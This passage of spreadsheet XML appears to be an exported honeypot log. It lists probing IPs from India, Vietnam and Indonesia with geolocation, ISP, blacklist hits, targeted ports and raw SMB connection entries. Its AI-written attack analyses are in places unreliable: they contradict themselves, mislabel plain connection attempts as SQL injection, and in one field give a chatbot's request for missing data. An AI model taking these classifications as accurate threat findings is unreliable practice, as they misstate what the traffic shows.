    <s v="{'dnsbl-2.uceprotect.net': ['unknown']&amp;&amp; 'dnsbl-3.uceprotect.net': ['unknown']}"/>
    <n v="79"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="HR"/>
    <s v="Haryana"/>
    <s v="Gurugram"/>
    <s v="Gurugram (Sector 44)"/>
    <s v="1270642"/>
    <s v="NA"/>
    <s v="28.4498"/>
    <s v="77.0761"/>
    <s v="24186"/>
    <s v="RailTel Corporation of India Ltd."/>
    <s v="RailTel Corporation of India Ltd."/>
    <s v="business"/>
    <s v="RailTel Corporation"/>
    <s v="2015-11-04"/>
    <s v="RAILTEL-IN"/>
    <s v="None"/>
    <s v="login&amp;&amp;connection"/>
    <s v="NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (103.30.65.187,52859)}&amp;&amp;{Data_SMB:Incoming connection (103.30.65.187,54260)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.30.65.187,7225)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.30.65.187,62660)}&amp;&amp;{Data_SMB:Incoming connection (103.30.65.187,63665)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.30.65.187,18520)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.30.65.187,42357)}&amp;&amp;{Data_SMB:Incoming connection (103.30.65.187,42678)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.30.65.187,45831)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.30.65.187,61559)}&amp;&amp;{Data_SMB:Incoming connection (103.30.65.187,61621)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.30.65.187,62980)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.30.65.187,45845)}&amp;&amp;{Data_SMB:Incoming connection (103.30.65.187,45934)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.30.65.187,47126)}&amp;&amp;{Data_SMB:Incoming connection (103.30.65.187,16133)}&amp;&amp;{Data_SMB:Incoming connection (103.30.65.187,16204)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.30.65.187,63560)}&amp;&amp;{Data_SMB:Incoming connection (103.30.65.187,64066)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.30.65.187,17201)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.30.65.187,59418)}&amp;&amp;{Data_SMB:Incoming connection (103.30.65.187,59451)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.30.65.187,59947)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:671e:41bb"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <s v="Data indicates an attempt to exploit or scan for vulnerabilities related to Microsoft SQL Server, suggesting a potential malicious activity such as database enumeration or unauthorized access attempt was made. No actual data was retrieved which could indicate the perpetrator was unable to gain access or retrieve information. This type of activity is often used by attackers to gather sensitive data or gain control over databases."/>
    <m/>
  </r>
  <r>
    <x v="840"/>
    <x v="840"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-25T16:03:04"/>
    <d v="2024-05-10T02:51:00"/>
    <d v="2025-04-25T16:03:04"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_MT-CPA_H2&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="48443&amp;&amp;23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="KL"/>
    <s v="Kerala"/>
    <s v="Trivandrum"/>
    <s v="Nedumangād"/>
    <s v="1261553"/>
    <s v="NA"/>
    <s v="8.60267"/>
    <s v="77.0014"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="MTNL Mumbai"/>
    <s v="business"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="2004-11-30"/>
    <s v="MTNL"/>
    <s v="None"/>
    <s v="None"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3bb6:949f"/>
    <s v="None"/>
    <s v="low"/>
    <s v="Low"/>
    <s v="No TELNET activity detected."/>
    <s v="Telnet Scan"/>
  </r>
  <r>
    <x v="841"/>
    <x v="841"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-25T15:29:35"/>
    <d v="2024-07-08T09:42:00"/>
    <d v="2025-04-25T15:29:35"/>
    <n v="49"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_SSH_H28&amp;&amp;SMA-LAB_MT-CPA_H26&amp;&amp;SMA-LAB_MSSQL_H13&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_MYSQL_H13"/>
    <s v="22&amp;&amp;45941&amp;&amp;1433&amp;&amp;38268&amp;&amp;3306&amp;&amp;445"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Thane"/>
    <s v="Navi Mumbai (MIDC Industrial Area)"/>
    <s v="6619347"/>
    <s v="NA"/>
    <s v="19.0652"/>
    <s v="73.0289"/>
    <s v="17762"/>
    <s v="Tata Teleservices (Maharashtra) Ltd"/>
    <s v="Tata Teleservices (Maharashtra) Limited"/>
    <s v="business"/>
    <s v="Tata Teleservices (Maharashtra) Ltd"/>
    <s v="2010-10-08"/>
    <s v="HTIL-TTML-IN"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="None&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_SMB:Incoming connection (49.248.15.234,59667)}&amp;&amp;{Data_SMB:Incoming connection (49.248.15.234,60176)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:31f8:fea"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <s v="An attempt was made to access Microsoft SQL database without authentication or credentials provided. This could be a brute-force attack to gain unauthorized access. The attackers are trying to exploit the lack of password protection for the SQL database."/>
    <m/>
  </r>
  <r>
    <x v="842"/>
    <x v="842"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-25T15:27:46"/>
    <d v="2025-04-25T15:27:46"/>
    <d v="2025-04-25T15:27:46"/>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dd:dfac"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <s v="This log suggests an attempt to connect to a telnet service, possibly by an attacker trying to gain unauthorized access or conduct reconnaissance on the system._x000a_The activity may be related to remote exploitation or scanning for vulnerabilities._x000a_This is likely an external probing or scanning activity. &amp;&amp; This indicates a failed attempt to connect or login to a telnet service, possibly due to incorrect credentials or an invalid request. The log does not contain any further information about the nature of the attempt. This suggests a potential probing activity for vulnerabilities in the system's telnet configuration."/>
    <m/>
  </r>
  <r>
    <x v="843"/>
    <x v="843"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-25T15:00:57"/>
    <d v="2025-04-25T14:44:52"/>
    <d v="2025-04-25T15:00:57"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MYSQL_HC1&amp;&amp;SMA-LAB_MSSQL_HC1"/>
    <s v="3306&amp;&amp;1433"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']&amp;&amp; 'cbl.abuseat.org': ['unknown']&amp;&amp; 'spambot.bls.digibase.ca': ['unknown']&amp;&amp; 'z.mailspike.net': ['unknown']&amp;&amp; 'zen.spamhaus.org': ['unknown'&amp;&amp; 'exploits']}"/>
    <n v="193"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="VN"/>
    <s v="Vietnam"/>
    <s v="13"/>
    <s v="Quảng Ninh"/>
    <s v="Thành Phố Uông Bí"/>
    <s v="Thành Phố Uông Bí"/>
    <s v="1563241"/>
    <s v="NA"/>
    <s v="21.0343"/>
    <s v="106.77"/>
    <s v="7552"/>
    <s v="Viettel Group"/>
    <s v="Viettel Corporation"/>
    <s v="residential"/>
    <s v="xDSL Services"/>
    <s v="2005-10-25"/>
    <s v="VIETTEL-VN"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MYSQL:NA}&amp;&amp;{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7deb:ebd1"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <s v="The system is detecting an attempt to connect to Microsoft SQL Server. This suggests a potential brute-force login or password cracking attempt. The lack of specific username or IP address makes it difficult to pinpoint the source. &amp;&amp; This indicates an attempt to access or exploit a Microsoft SQL server, potentially for unauthorized database access or injection._x000a_The user is likely trying to gain unauthorized access to the database using a vulnerability in the system._x000a_Malicious activity detected."/>
    <s v="SQL Inject &amp;&amp; SQL Injection"/>
  </r>
  <r>
    <x v="844"/>
    <x v="844"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-25T14:37:01"/>
    <d v="2025-04-25T14:37:01"/>
    <d v="2025-04-25T14:37:01"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="New Delhi"/>
    <s v="New Delhi (Janpath)"/>
    <s v="1261481"/>
    <s v="110001"/>
    <s v="28.6296"/>
    <s v="77.2183"/>
    <s v="17813"/>
    <s v="MTNL-AP"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="corporate"/>
    <s v="MTNL Delhi"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7839:799b"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <s v="No malicious activity detected as TELNET service is not used by attackers in this log entry. This indicates that no attempts were made to access the telnet service. The telnet service remains inactive. &amp;&amp; Unknown TELNET login attempt with no further details available. No credentials or IP address provided, making it difficult to assess severity. May indicate reconnaissance activity."/>
    <m/>
  </r>
  <r>
    <x v="845"/>
    <x v="845"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-25T14:34:53"/>
    <d v="2024-05-28T19:26:40"/>
    <d v="2025-04-25T14:34:53"/>
    <n v="187"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SMB_H45&amp;&amp;SMA-LAB_MT-CPA_H25&amp;&amp;SMA-LAB_MSSQL_HC1"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;445&amp;&amp;5859&amp;&amp;1433"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="New Delhi"/>
    <s v="New Delhi"/>
    <s v="1261481"/>
    <s v="110001"/>
    <s v="28.6139"/>
    <s v="77.2088"/>
    <s v="9498"/>
    <s v="Bharti Airtel Limited"/>
    <s v="Bharti Airtel"/>
    <s v="residential"/>
    <s v="Obeetee Private Limited"/>
    <s v="2005-08-03"/>
    <s v="OEET-4178684-MIRZAPUR"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="NA&amp;&amp;{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7d10:5baa"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <s v="This indicates an attempt to access the Microsoft SQL Server database, likely for malicious purposes such as stealing sensitive data or exploiting vulnerabilities. The lack of a response suggests the attacker was attempting to connect anonymously. An empty Data_MSSQL field may indicate a scanning activity rather than a genuine login attempt."/>
    <m/>
  </r>
  <r>
    <x v="846"/>
    <x v="846"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-25T14:34:44"/>
    <d v="2023-07-25T00:53:18"/>
    <d v="2025-04-25T14:34:44"/>
    <n v="7010"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_LDAP_H29&amp;&amp;SMA-LAB_PJL_H24&amp;&amp;SMA-LAB_HTTP_H33&amp;&amp;SMA-LAB_HTTPS_H14&amp;&amp;SMA-LAB_IPP_H24&amp;&amp;SMA-LAB_SSH_H14&amp;&amp;SMA-LAB_SMB_H1&amp;&amp;SMA-LAB_NTP_H46&amp;&amp;SMA-LAB_VNC_H47&amp;&amp;SMA-LAB_MT-CPA_H5&amp;&amp;SMA-LAB_MSSQL_H44&amp;&amp;SMA-LAB_SMB_H24&amp;&amp;SMA-LAB_MSSQL_H24&amp;&amp;SMA-LAB_MSSQL_H16&amp;&amp;SMA-LAB_MSSQL_H23&amp;&amp;SMA-LAB_MSSQL_H26&amp;&amp;SMA-LAB_SMB_H44&amp;&amp;SMA-LAB_SMB_H35&amp;&amp;SMA-LAB_MSSQL_HC1"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;389&amp;&amp;9100&amp;&amp;80&amp;&amp;443&amp;&amp;631&amp;&amp;22&amp;&amp;445&amp;&amp;123&amp;&amp;5900&amp;&amp;30524&amp;&amp;1433"/>
    <s v="True"/>
    <s v="{'z.mailspike.net': ['unknown']}"/>
    <n v="32"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="ID"/>
    <s v="Indonesia"/>
    <s v="JB"/>
    <s v="West Java"/>
    <s v="Kota Depok"/>
    <s v="Gandul"/>
    <s v="1644491"/>
    <s v="NA"/>
    <s v="-6.34212"/>
    <s v="106.787"/>
    <s v="9341"/>
    <s v="PT Indonesia Comnets Plus"/>
    <s v="ICONPLN"/>
    <s v="business"/>
    <s v="NA"/>
    <s v="2016-10-06"/>
    <s v="ICONPLN-ID"/>
    <s v="None"/>
    <s v="login&amp;&amp;connection"/>
    <s v="NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (103.76.172.11,60786)}&amp;&amp;{Data_SMB:Incoming connection (103.76.172.11,61152)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.76.172.11,52664)}&amp;&amp;{Data_SMB:Incoming connection (103.76.172.11,53069)}&amp;&amp;{Data_SMB:Incoming connection (103.76.172.11,49482)}&amp;&amp;{Data_SMB:Incoming connection (103.76.172.11,49947)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.76.172.11,55577)}&amp;&amp;{Data_SMB:Incoming connection (103.76.172.11,55972)}&amp;&amp;{Data_SMB:Incoming connection (103.76.172.11,55183)}&amp;&amp;{Data_SMB:Incoming connection (103.76.172.11,55591)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.76.172.11,55619)}&amp;&amp;{Data_SMB:Incoming connection (103.76.172.11,50308)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:674c:ac0b"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <s v="A potential malicious SMB connection attempt from an unknown IP address. The IP address 103.76.172.11 is attempting to establish a connection to the system's shared resources. This could be indicative of a brute force attack or unauthorized access attempt. &amp;&amp; Malicious activity detected: an unknown computer is attempting to establish a connection to a shared resource from the monitored system with IP address 103.76.172.11. The connection is coming from port 50308 on this remote system. This could be a potential attack attempt through a service."/>
    <m/>
  </r>
  <r>
    <x v="847"/>
    <x v="847"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-25T14:24:17"/>
    <d v="2025-04-25T14:04:36"/>
    <d v="2025-04-25T14:24:17"/>
    <n v="3"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MYSQL_HC1"/>
    <s v="3306"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="WB"/>
    <s v="West Bengal"/>
    <s v="Kolkata"/>
    <s v="Kolkata (Kailas Nagar)"/>
    <s v="1275004"/>
    <s v="700052"/>
    <s v="22.7124"/>
    <s v="88.4741"/>
    <s v="133240"/>
    <s v="WAVETREE NETWORKS PVT LTD"/>
    <s v="Wavetree Networks PVT LTD"/>
    <s v="business"/>
    <s v="Wavetree Networks PVT LTD"/>
    <s v="2014-04-30"/>
    <s v="WAVETREE1"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MYSQL:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:67e6:66b1"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <s v="Possible brute force attack attempt on MySQL database login credentials, indicating malicious actor trying to access sensitive information through invalid or guessed login attempts with no success yet. &amp;&amp; Possible brute force attempt against MySQL service, as there is no login activity but still a connection attempt was made. This could indicate an automated script trying to gain unauthorized access. No actual database interaction occurred."/>
    <s v="SQL Injection &amp;&amp; MySQL Attack"/>
  </r>
  <r>
    <x v="848"/>
    <x v="848"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-25T14:17:31"/>
    <d v="2025-02-17T13:05:06"/>
    <d v="2025-04-25T14:17:31"/>
    <n v="21"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_MSSQL_H23&amp;&amp;SMA-LAB_MSSQL_HC1"/>
    <s v="1433&amp;&amp;63360"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MP"/>
    <s v="Madhya Pradesh"/>
    <s v="Bhopal"/>
    <s v="Bhopal (Arera Hills)"/>
    <s v="1275841"/>
    <s v="462027"/>
    <s v="23.2433"/>
    <s v="77.4298"/>
    <s v="141295"/>
    <s v="Madhya Pradesh Agency For Promotion   Of Information Technology"/>
    <s v="Madhya Pradesh Agency Promotion Of Information Technology"/>
    <s v="business"/>
    <s v="Madhya Pradesh Agency For Promotion Of Information Technology"/>
    <s v="2020-12-14"/>
    <s v="MAPIT"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login&amp;&amp;NA"/>
    <s v="{Data_MSSQl:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:67a0:316e"/>
    <s v="C-I"/>
    <s v="low&amp;&amp;medium"/>
    <s v="Low"/>
    <s v="No log data provided, unable to analyze. &amp;&amp; No log data provided, therefore, no analysis can be made. &amp;&amp; No log data provided, unable to analyze potential malicious activity. &amp;&amp; The data suggests attempted brute-force login attempts, indicating unauthorized access attempts to the server. This activity may be part of a larger phishing or malware attack campaign. The attackers are likely using automated scripts to try various combinations of usernames and passwords."/>
    <s v="I need some actual log data to analyze! Please provide the log data, and I'll do my best to identify the type of attack. &amp;&amp; I'd be happy to help analyze the log data, but it appears that there is no log data provided. Please provide the actual log data and I will assist in identifying the type of attack. &amp;&amp; There is no log data provided to analyze. Please provide the log data for me to identify the types of attacks."/>
  </r>
  <r>
    <x v="849"/>
    <x v="849"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-25T13:35:57"/>
    <d v="2025-04-04T13:59:18"/>
    <d v="2025-04-25T13:35:57"/>
    <n v="11"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H43"/>
    <s v="1433"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Pune"/>
    <s v="Pimpri-Chinchwad (Kalewadi Phata)"/>
    <s v="7626690"/>
    <s v="NA"/>
    <s v="18.6347"/>
    <s v="73.8195"/>
    <s v="132770"/>
    <s v="Gazon Communications India Limited"/>
    <s v="Gazon Communications India Limited"/>
    <s v="business"/>
    <s v="Abilitynetworks"/>
    <s v="2015-12-11"/>
    <s v="ABILITYNETWORKS"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:67f1:515e"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="850"/>
    <x v="850"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-25T13:18:34"/>
    <d v="2024-12-11T16:35:36"/>
    <d v="2025-04-25T13:18:34"/>
    <n v="21"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_SMB_H32&amp;&amp;SMA-LAB_SMB_H17"/>
    <s v="1433&amp;&amp;445"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MP"/>
    <s v="Madhya Pradesh"/>
    <s v="Dewas"/>
    <s v="Dewas"/>
    <s v="1273066"/>
    <s v="455001"/>
    <s v="22.9676"/>
    <s v="76.0534"/>
    <s v="9498"/>
    <s v="Bharti Airtel Limited"/>
    <s v="Bharti Airtel"/>
    <s v="business"/>
    <s v="Bharti Airtel Ltd"/>
    <s v="2010-02-17"/>
    <s v="IGEE-3186116-Dewas"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="NA&amp;&amp;{Data_SMB:Incoming connection (182.71.72.20,62650)}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (182.71.72.20,61378)}&amp;&amp;{Data_SMB:Incoming connection (182.71.72.20,62221)}&amp;&amp;{Data_SMB:Incoming connection (182.71.72.20,61702)}&amp;&amp;{Data_SMB:Incoming connection (182.71.72.20,62311)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:b647:4814"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <s v="Possible malicious activity involves an incoming suspicious SMB connection from an IP address attempting to establish unauthorized access or potentially spread malware. This could be part of a larger attack attempt on the network. Further analysis is needed to determine intent and severity. &amp;&amp; An incoming connection from an unknown IP address is attempting to access shared resources on the network. This could be a potential attempt at unauthorized file sharing or data theft. The user's intentions may not be legitimate. &amp;&amp; The data indicates an incoming SMB connection attempt from IP address 182.71.72.20 to the monitored system's shared resources. This could be a potential attack vector for malware or unauthorized data access. The source may be attempting to exploit vulnerabilities in the SMB service. &amp;&amp; A potential 